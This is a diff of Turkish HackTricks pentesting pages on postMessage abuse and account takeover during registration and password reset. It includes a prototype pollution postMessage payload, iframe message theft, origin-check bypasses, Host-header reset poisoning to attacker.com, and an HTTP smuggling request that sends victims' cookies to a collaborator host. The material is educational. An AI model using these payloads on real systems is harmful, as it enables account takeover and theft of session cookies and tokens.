## **PostMessage** Gönder
**PostMessage**, bir mesaj göndermek için aşağıdaki işlevi kullanır:
@ -44,14 +58,14 @@ win = open('URL-with-iframe-inside', 'hack', 'width=800,height=300,top=500');
## loop until win.length == 1 (until the iframe is loaded)
win[0].postMessage('{"__proto__":{"isAdmin":True}}', '*')
```
**targetOrigin** değeri '\*' veya _https://company.com_ gibi bir URL olabilir.\
İkinci senaryoda, mesaj sadece o etki alanına gönderilebilir (pencere nesnesinin kökeni farklı olsa bile).\
Eğer joker karakter kullanılırsa, mesajlar herhangi bir etki alanına gönderilebilir ve pencere nesnesinin kökenine gönderilir.
**targetOrigin**'ın '\*' veya _https://company.com_ gibi bir URL olabileceğini unutmayın.\
**İkinci senaryoda**, **mesaj sadece o alan adına gönderilebilir** (pencere nesnesinin kökeni farklı olsa bile).\
**Joker karakteri** kullanıldığında, **mesajlar herhangi bir alan adına gönderilebilir** ve Pencere nesnesinin kökenine gönderilir.
### iframe ve joker karakter saldırısı **targetOrigin** üzerinde
### iframe ve wildcard hedefOrigin saldırısı
[**Bu raporda**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) açıklandığı gibi, eğer **X-Frame-Header** koruması olmayan bir sayfa bulursanız ve bu sayfa **duyarlı** mesajları **wildcard** (\*) kullanarak **postMessage** ile gönderiyorsa, **iframe**'in kökenini değiştirerek ve **duyarlı** mesajı sizin kontrol ettiğiniz bir etki alanına **sızdırabilirsiniz**.\
Unutmayın, sayfa iframelenebilir ancak **targetOrigin** bir URL'ye ayarlanmışsa ve joker karakter kullanılmamışsa, bu **hile işe yaramaz**.
[**Bu raporda**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) açıklandığı gibi, **X-Frame-Header** koruması olmayan bir sayfa bulursanız ve bu sayfa **duyarlı** mesajları **wildcard** (\*) kullanarak **postMessage** ile gönderiyorsa, **iframe'ın kökenini değiştirerek** ve **duyarlı** mesajı size ait bir alan adına **sızdırabilirsiniz**.\
Sayfanın iframelenebilmesine rağmen **targetOrigin** bir URL'ye ayarlanmış ve joker karakteri kullanılmamışsa, bu **hile işe yaramaz**.
```markup
<html>
<iframe src="https://docs.google.com/document/ID" />
@ -91,7 +105,7 @@ Mevcut sayfadaki olay dinleyicilerini bulmak için şunları yapabilirsiniz:
![](<../../.gitbook/assets/image (393).png>)
- [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) veya [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker) gibi bir tarayıcı eklentisi kullanın. Bu tarayıcı eklentileri tüm iletileri yakalayacak ve size gösterecektir.
- [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) veya [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker) gibi bir tarayıcı eklentisi kullanın. Bu tarayıcı eklentileri tüm mesajları yakalayacak ve size gösterecektir.
### Köken kontrolü atlatmaları
@ -101,13 +115,13 @@ Mevcut sayfadaki olay dinleyicilerini bulmak için şunları yapabilirsiniz:
```javascript
("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")
```
- `String.prototype.search()` yöntemi olan **`search()`** metodu düzenli ifadeler için tasarlanmış olup, dizgiler için değil. Düzenli ifadeler dışında bir şey geçirilmesi, yöntemin potansiyel olarak güvensiz olmasına neden olabilir. Çünkü düzenli ifadelerde nokta (.) joker karakter olarak işlev görerek özel oluşturulmuş alanlarla doğrulamayı atlatmaya olanak tanır. Örneğin:
- `String.prototype.search()` yöntemi olan **`search()`** metodu düzenli ifadeler için tasarlanmış olup, dizgiler için değil. Düzenli ifadeden başka bir şey geçirilmesi durumunda, bu, yöntemin potansiyel olarak güvensiz olmasına neden olabilir. Çünkü düzenli ifadede nokta (.) joker karakter olarak işlev görerek özel oluşturulmuş alanlarla doğrulamayı atlamaya olanak tanır. Örneğin:
```javascript
"https://www.safedomain.com".search("www.s.fedomain.com")
```
- `search()` gibi **`match()`** fonksiyonu da regex işler. Regex yanlış yapılandırılmışsa, atlatılabilir olabilir.
- `escapeHtml` fonksiyonu girdileri temizlemek için tasarlanmış olup karakterleri kaçırır. Ancak yeni bir kaçırılmış nesne oluşturmaz, mevcut nesnenin özelliklerini üzer yazar. Bu davranış istismar edilebilir. Özellikle, bir nesne kontrol edilecek şekilde manipüle edilebilirse ve kontrol edilen özellik `hasOwnProperty`'yi kabul etmezse, `escapeHtml` beklenildiği gibi çalışmaz. Aşağıdaki örneklerde gösterildiği gibi:
- **`match()`** fonksiyonu, `search()` gibi düzenli ifadeleri işler. Düzenli ifade yanlış yapılandırılmışsa, atlatılabilir olabilir.
- `escapeHtml` fonksiyonu, karakterleri kaçırarak girişleri temizlemek için tasarlanmıştır. Ancak yeni bir kaçırılmış nesne oluşturmaz, mevcut nesnenin özelliklerini üzerine yazar. Bu davranış istismar edilebilir. Özellikle, bir nesne, kontrol edilen özelliğinin `hasOwnProperty`'yi kabul etmediği şekilde manipüle edilebilirse, `escapeHtml` beklenildiği gibi çalışmayabilir. Aşağıdaki örneklerde gösterildiği gibi:
- Beklenen Başarısızlık:
@ -124,16 +138,16 @@ result = u(new Error("'\"<b>\\"));
result.message; // "'"<b>\"
```
Bu zafiyet bağlamında, `File` nesnesi, salt okunur `name` özelliği nedeniyle dikkate değer şekilde istismar edilebilir. Bu özellik, şablonlarda kullanıldığında `escapeHtml` fonksiyonu tarafından temizlenmez ve potansiyel güvenlik risklerine yol açabilir.
- JavaScript'teki `document.domain` özelliği, alan adını kısaltmak için bir betik tarafından ayarlanabilir, aynı ana etki alanı içinde daha esnek aynı köken politikası uygulamasına olanak tanır.
Bu zafiyet bağlamında, `File` nesnesi, salt okunur `name` özelliği nedeniyle dikkate değer şekilde istismar edilebilir. Bu özellik, şablonlarda kullanıldığında, `escapeHtml` fonksiyonu tarafından temizlenmez ve potansiyel güvenlik risklerine yol açabilir.
- JavaScript'teki `document.domain` özelliği, alanı kısaltmak için bir betik tarafından ayarlanabilir, aynı ana etki alanı içinde daha esnek aynı köken politikası uygulamasına olanak tanır.
### e.origin == window.origin atlatma
%%%%%% kullanarak bir web sayfasını **sandboxed iframe** içine yerleştirirken, iframe'ın kökeninin null olarak ayarlanacağını anlamak önemlidir. Bu, **sandbox öznitelikleri** ve bunların güvenlik ve işlevsellik üzerindeki etkileriyle ilgilenirken özellikle önemlidir.
Sandbox özniteliğinde **`allow-popups`** belirterek, iframe'den açılan herhangi bir açılır pencere, ebeveyninin sandbox kısıtlamalarını devralır. Bu, açılır pencerenin kökeninin de `null` olarak ayarlandığı anlamına gelir. Bu durum, açılır pencerenin kökeninin de `null` olarak ayarlandığı için iframe ve açılır pencerenin her ikisinin de köken değerinin `null` olduğu bir senaryoya yol açar.
Sandbox özniteliğinde **`allow-popups`** belirterek, iframe'dan açılan herhangi bir açılır pencere, ebeveyninin sandbox kısıtlamalarını devralır. Bu, açılır pencerenin kökeninin de `null` olarak ayarlandığı anlamına gelir. Bu durum, açılır pencerenin kökeninin de `null` olarak ayarlandığı iframe'ın kökeniyle uyumlu hale getirilmesi anlamına gelir.
Bu koşullar altında bir açılır pencere açıldığında ve iframe'den açılır pencereye **`postMessage`** kullanılarak bir ileti gönderildiğinde, hem gönderme hem de alma uçlarının kökenleri `null` olarak ayarlanır. Bu durum, iframe ve açılır pencerenin `null == null` olarak değerlendirildiği bir senaryoya yol açar, çünkü hem iframe hem de açılır pencere `null` olan aynı köken değerini paylaşırlar.
Sonuç olarak, bu koşullar altında bir açılır pencere açıldığında ve iframe'dan açılır pencereye **`postMessage`** kullanılarak bir mesaj gönderildiğinde, hem gönderme hem de alma uçlarının kökenleri `null` olarak ayarlanır. Bu durum, iframe'ın ve açılır pencerenin `null` olan aynı kökene sahip olması nedeniyle **`e.origin == window.origin`** ifadesinin doğru değerlendirilmesine (`null == null`) yol açar.
Daha fazla bilgi için **okuyun**:
@ -143,14 +157,14 @@ Daha fazla bilgi için **okuyun**:
### e.source Atlatma
İletinin, betiğin dinlediği aynı pencereden gelip gelmediğini kontrol etmek mümkündür (özellikle **Tarayıcı uzantılarından Gelen İçerik Betikleri** için ilginç olabilir, ileti sayfanın aynı sayfadan mı gönderildiğini kontrol etmek için):
Mesajın, betiğin dinlediği pencereden geldiğini kontrol etmek mümkündür (özellikle **Tarayıcı uzantılarından Gelen İçerik Betikleri** için özellikle ilginçtir, mesajın aynı sayfadan mı gönderildiğini kontrol etmek için):
```javascript
// If its not, return immediately.
if( received_message.source !== window ) {
return;
}
```
**`e.source`**'un bir mesajın **iframe** oluşturarak **zorla null** olmasını sağlayabilirsiniz ve **hemen silinir**.
**`e.source`**'un bir mesajın **iframe** oluşturarak **null** olmasını sağlayabilirsiniz ve **hemen silinir**.
Daha fazla bilgi için **okuyun:**
@ -170,7 +184,7 @@ setTimeout(function(){w.postMessage('text here','*');}, 2000);
```
### Ana sayfayı engelleyerek çocuğa gönderilen mesajı çalmak
Aşağıdaki sayfada, **duyarlı postmessage verilerini** bir **çocuk iframe**'e gönderilmeden önce **ana** sayfayı **engelleyerek** ve **çocukta XSS** kullanarak **verinin alınmasını** sağlayarak çalabileceğinizi görebilirsiniz:
Aşağıdaki sayfada, **ana sayfayı engelleyerek** verileri göndermeden önce **ana sayfayı engelleyerek** ve **çocuk iframe'indeki XSS'i** kötüye kullanarak **alınan hassas postmessage verilerini** nasıl çalabileceğinizi görebilirsiniz:
{% content-ref url="blocking-main-page-to-steal-postmessage.md" %}
[blocking-main-page-to-steal-postmessage.md](blocking-main-page-to-steal-postmessage.md)
@ -178,19 +192,19 @@ Aşağıdaki sayfada, **duyarlı postmessage verilerini** bir **çocuk iframe**'
### Iframe konumunu değiştirerek mesaj çalmak
Eğer X-Frame-Header olmadan bir iframe içeren bir web sayfasını iframe'leyebilirseniz, o çocuk iframe'inin konumunu değiştirebilirsiniz, böylece bir **joker** kullanarak gönderilen bir **postmessage** alıyorsa, saldırgan o iframe'in **kökenini** kendi kontrolünde olan bir sayfaya **değiştirebilir** ve mesajı **çalabilir**:
Eğer X-Frame-Header olmadan bir iframe içerebilecek bir web sayfasını iframe'leyebilirseniz ve bu iframe başka bir iframe içeriyorsa, o çocuk iframe'inin konumunu değiştirebilirsiniz, böylece bir saldırgan, iframe'in **kökenini** kendi tarafından **kontrol edilen** bir sayfaya **değiştirerek** postmessage ile gönderilen bir mesajı **çalabilir**:
{% content-ref url="steal-postmessage-modifying-iframe-location.md" %}
[steal-postmessage-modifying-iframe-location.md](steal-postmessage-modifying-iframe-location.md)
{% endcontent-ref %}
### postMessage ile Prototype Pollution ve/veya XSS
### postMessage ile Prototype Pollution ve/veya XSS çalmak
`postMessage` aracılığıyla gönderilen verilerin JS tarafından yürütüldüğü senaryolarda, **sayfayı iframe'leyebilir** ve **prototype pollution/XSS**'yi **sömürebilir** ve saldırıyı `postMessage` aracılığıyla göndererek gerçekleştirebilirsiniz.
`postMessage` aracılığıyla gönderilen verilerin JS tarafından yürütüldüğü senaryolarda, **sayfayı iframe'leyebilir** ve **prototype pollution/XSS**'yi kötüye kullanarak **exploit** edebilirsiniz.
**Çok iyi açıklanan birkaç XSS** örneği, [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html) adresinde bulunabilir.
`postMessage` aracılığıyla **çok iyi açıklanan XSS örnekleri** [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html) adresinde bulunabilir.
Bir `iframe`'e **Prototype Pollution**'ı kötüye kullanmak ve ardından `XSS`'yi kötüye kullanmak için bir `postMessage` aracılığıyla saldırmak için bir kötüye kullanım örneği:
Bir `iframe`'e **Prototype Pollution ve ardından XSS**'yi kötüye kullanmak için bir `postMessage` ile kötüye kullanım örneği:
```html
<html>
<body>
@ -218,16 +232,28 @@ setTimeout(get_code, 2000);
* [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
* Pratik yapmak için: [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **karanlık ağ** destekli bir arama motorudur.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Sıfırdan başlayarak AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'u takip edin.
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) katılın veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR'lar göndererek paylaşın.
</details>

View file

@ -1,45 +1,59 @@
# Kayıt ve Ele Geçirme Zafiyetleri
# Kayıt ve Ele Geçirme Güvenlik Açıklıkları
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramanla öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**.
* Hacking hilelerinizi göndererek **HackTricks** ve **HackTricks Cloud** github depolarına **PR göndererek** paylaşın.
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da **takip edin**.
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
## Kayıt Ele Geçirme
### Yinelemeli Kayıt
### Çift Kayıt
* Var olan bir kullanıcı adı kullanarak oluşturmayı deneyin
* E-postayı değiştirerek kontrol edin:
* büyük harf
* \+1@
* e-postada nokta ekleyin
* e-postada birkaç nokta ekleyin
* e-posta adında özel karakterler (%00, %09, %20)
* E-postadan sonra siyah karakterler ekleyin: `test@test.com a`
* victim@gmail.com@attacker.com
* victim@attacker.com@gmail.com
### Kullanıcı Adı Sorgulama
### Kullanıcı Adı Sıralaması
Uygulama içinde bir kullanıcı adının zaten kaydedilip kaydedilmediğini bulmaya çalışın.
Bir kullanıcı adının uygulama içinde zaten kaydedilip kaydedilmediğini anlamaya çalışın.
### Şifre Politikası
Bir kullanıcı oluştururken şifre politikasını kontrol edin (zayıf şifreler kullanabilir misiniz).\
Bu durumda kimlik bilgilerini kaba kuvvet saldırısıyla deneyebilirsiniz.
Kullanıcı oluştururken şifre politikasını kontrol edin (zayıf şifreler kullanılıp kullanılamayacağını kontrol edin).\
Bu durumda kimlik bilgilerini brute force deneyebilirsiniz.
### SQL Enjeksiyonu
Kayıt formlarında hesap ele geçirme veya bilgi çalma girişimlerinde bulunmak için **SQL Enjeksiyonları** hakkında bilgi almak için [**bu sayfayı kontrol edin**](sql-injection/#insert-statement).
Hesap ele geçirmelerini denemek veya kayıt formlarından bilgi çekmek için **SQL Enjeksiyonları** yapmak için [**bu sayfayı kontrol edin**](sql-injection/#insert-statement).
### Oauth Ele Geçirmeleri
@ -47,7 +61,7 @@ Kayıt formlarında hesap ele geçirme veya bilgi çalma girişimlerinde bulunma
[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
{% endcontent-ref %}
### SAML Zafiyetleri
### SAML Güvenlik Açıklıkları
{% content-ref url="saml-attacks/" %}
[saml-attacks](saml-attacks/)
@ -55,29 +69,29 @@ Kayıt formlarında hesap ele geçirme veya bilgi çalma girişimlerinde bulunma
### E-posta Değiştirme
Kayıt olduktan sonra e-postayı değiştirmeyi deneyin ve bu değişikliğin doğru bir şekilde doğrulandığını veya keyfi e-postalara değiştirilebileceğini kontrol edin.
Kayıt olduktan sonra e-postayı değiştirmeyi deneyin ve bu değişikliğin doğru bir şekilde doğrulandığını veya rastgele e-postalara değiştirilebileceğini kontrol edin.
### Diğer Kontroller
### Daha Fazla Kontrol
* **Geçici e-postaları** kullanıp kullanamayacağınızı kontrol edin
* **Uzun** **şifre** (>200), **DoS**'a neden olur
* Hesap oluşturma üzerindeki **hız sınırlarını kontrol edin**
* **Tek kullanımlık e-postaları** kullanıp kullanamayacağınızı kontrol edin
* **Uzun** **şifre** (>200) **DoS**'a neden olur
* Hesap oluştururken **hız sınırlarını kontrol edin**
* username@**burp\_collab**.net kullanın ve **geri çağrıyı** analiz edin
## **Şifre Sıfırlama Ele Geçirmesi**
### Şifre Sıfırlama Jetonu Referrer Üzerinden Sızıntı <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
### Referans Aracılığıyla Şifre Sıfırlama Jetonu Sızıntısı <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
1. E-posta adresinize şifre sıfırlama isteği gönderin
2. Şifre sıfırlama bağlantısına tıklayın
3. Şifreyi değiştirmeyin
4. Herhangi bir 3. taraf web sitesine tıklayın (örneğin: Facebook, twitter)
5. Burp Suite proxy'de isteği yakalayın
4. Herhangi bir 3. taraf web sitesine (örneğin: Facebook, twitter) tıklayın
5. Burp Suite proxy'de isteği onaylayın
6. Referer başlığının şifre sıfırlama jetonunu sızdırıp sızdırmadığını kontrol edin.
### Şifre Sıfırlama Zehirlenmesi <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
1. Şifre sıfırlama isteğini Burp Suite'de yakalayın
1. Burp Suite'de şifre sıfırlama isteğini onaylayın
2. Burp Suite'de aşağıdaki başlıkları ekleyin veya düzenleyin: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Değiştirilmiş başlıkla isteği yönlendirin\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
@ -102,56 +116,56 @@ email=victim@mail.com|hacker@mail.com
```
### API Parametrelerinde IDOR <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
1. Saldırgan, kendi hesabıyla giriş yapmalı ve **Şifre Değiştirme** özelliğine gitmelidir.
2. Burp Suite'i başlatın ve isteği Intercept edin.
3. İsteği repeater sekmesine gönderin ve parametreleri düzenleyin: Kullanıcı Kimliği/e-posta\
1. Saldırgan kendi hesabıyla giriş yapmalı ve **Şifre Değiştir** özelliğine gitmelidir.
2. Burp Suite'u başlatın ve isteği Intercept edin.
3. İsteği tekrarlayıcı sekmesine gönderin ve parametreleri düzenleyin: Kullanıcı Kimliği/e-posta\
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
### Zayıf Şifre Sıfırlama Jetonu <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
Şifre sıfırlama jetonu her seferinde rastgele oluşturulmalı ve benzersiz olmalıdır.\
Jetonun süresinin dolup dolmadığını veya her zaman aynı olup olmadığını belirlemeye çalışın, bazı durumlarda üretim algoritması zayıf olabilir ve tahmin edilebilir. Aşağıdaki değişkenler algoritma tarafından kullanılabilir.
Jetonun süresinin dolup dolmadığını veya her zaman aynı olup olmadığını belirlemeye çalışın, bazı durumlarda oluşturma algoritması zayıf olabilir ve tahmin edilebilir. Aşağıdaki değişkenler algoritma tarafından kullanılabilir.
* Zaman damgası
* Zaman Damgası
* Kullanıcı Kimliği
* Kullanıcının E-postası
* Ad ve Soyad
* Doğum Tarihi
* Kriptografi
* Sadece sayı
* Küçük jeton dizisi (A-Z, a-z, 0-9 arasındaki karakterler)
* Yalnızca Sayı
* Küçük jeton dizisi (karakterler arasında \[A-Z,a-z,0-9])
* Jeton yeniden kullanımı
* Jetonun süresi dolma tarihi
* Jetonun son kullanma tarihi
### Şifre Sıfırlama Jetonunun Sızdırılması <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
### Sızan Şifre Sıfırlama Jetonu <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
1. API/UI kullanarak belirli bir e-posta için şifre sıfırlama isteği tetikleyin, örneğin: test@mail.com
2. Sunucu yanıtını inceleyin ve `resetToken` için kontrol edin.
3. Ardından, `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]` gibi bir URL'de jetonu kullanın.
1. Belirli bir e-posta için API/UI kullanarak şifre sıfırlama isteği tetikleyin, örneğin: test@mail.com
2. Sunucu yanıtını inceleyin ve `resetToken` için kontrol edin
3. Ardından, jetonu aşağıdaki gibi bir URL'de kullanın: `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
### Kullanıcı Adı Çakışmasıyla Şifre Sıfırlama <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
### Kullanıcı Adı Çakışması Yoluyla Şifre Sıfırlama <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
1. Sisteme, kurbanın kullanıcı adıyla aynı olan bir kullanıcı adıyla kaydolun, ancak kullanıcı adının önüne ve/veya arkasına boşluk ekleyin. Örneğin: `"admin "`
2. Kötü niyetli kullanıcı adıyla bir şifre sıfırlama isteği yapın.
3. E-postanıza gönderilen jetonu kullanarak kurbanın şifresini sıfırlayın.
4. Yeni şifreyle kurban hesabına bağlanın.
1. Kurbanın kullanıcı adına, ancak kullanıcı adının önüne ve/veya arkasına boşluklar eklenmiş aynı olan bir kullanıcı adıyla sistemde kaydolun, örneğin: `"admin "`
2. Kötü niyetli kullanıcı adınızla bir şifre sıfırlama isteği isteyin.
3. E-postanıza gönderilen jetonu kullanın ve kurbanın şifresini sıfırlayın.
4. Yeni şifre ile kurban hesabına bağlanın.
CTFd platformu bu saldırıya karşı savunmasızdı.\
Platform CTFd bu saldırıya karşı savunmasızdı.\
Bkz: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
### Cross Site Scripting ile Hesap Ele Geçirme <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
### XSS Aracılığıyla Hesap Ele Geçirme <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
1. Uygulama içinde veya çerezlerin üst etki alanına sahip bir alt etki alanında XSS bulun.
2. Mevcut **oturum çerezini** sızdırın.
3. Çerez kullanarak kullanıcı olarak kimlik doğrulayın.
1. Uygulama içinde veya çerezler üst etki alanına sahipse alt etki alanında bir XSS bulun: `*.domain.com`
2. Mevcut **oturum çerezini** sızdırın
3. Çerez kullanarak kullanıcı olarak kimlik doğrulayın
### HTTP İstek Smuggling ile Hesap Ele Geçirme <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
### HTTP İstek Kaçırma Aracılığıyla Hesap Ele Geçirme <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
1\. HTTP İstek Smuggling türünü (CL, TE, CL.TE) tespit etmek için **smuggler** kullanın\
1\. Türüne göre HTTP İstek Kaçırma (CL, TE, CL.TE) tespit etmek için **smuggler** kullanın\
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2\. Aşağıdaki verilerle `POST / HTTP/1.1`'i üzerine yazacak bir istek oluşturun:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` kurbanları burpcollab'a yönlendirerek çerezlerini çalma amacıyla\
3\. Son istek aşağıdaki gibi görünebilir
2\. `POST / HTTP/1.1`'i aşağıdaki verilerle üzerine yazacak bir istek oluşturun:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` hedef, kurbanları burpcollab'a yönlendirmek ve çerezlerini çalmaktır\
3\. Son istek aşağıdaki gibi olabilir
```
GET / HTTP/1.1
Transfer-Encoding: chunked
@ -163,18 +177,14 @@ Content-Length: 83
GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
Bu hata Hackerone raporları tarafından sömürülmüştür:
* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)
* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
### CSRF Aracılığıyla Hesap Ele Geçirme <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
### CSRF ile Hesap Ele Geçirme <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
1. CSRF için bir payload oluşturun, örn: "Şifre değişikliği için otomatik gönderimli HTML formu"
2. Payload'u gönderin
1. CSRF için bir payload oluşturun, örneğin: "Parola değişikliği için otomatik gönderimli HTML formu"
2. Payload'ı gönderin
### JWT Aracılığıyla Hesap Ele Geçirme <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
### JWT ile Hesap Ele Geçirme <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
JSON Web Token, bir kullanıcının kimlik doğrulaması için kullanılabilir.
JSON Web Token, bir kullanıcıyı doğrulamak için kullanılabilir.
* JWT'yi başka bir Kullanıcı Kimliği / E-posta ile düzenleyin
* Zayıf JWT imzasını kontrol edin
@ -187,16 +197,30 @@ JSON Web Token, bir kullanıcının kimlik doğrulaması için kullanılabilir.
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevsellikler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
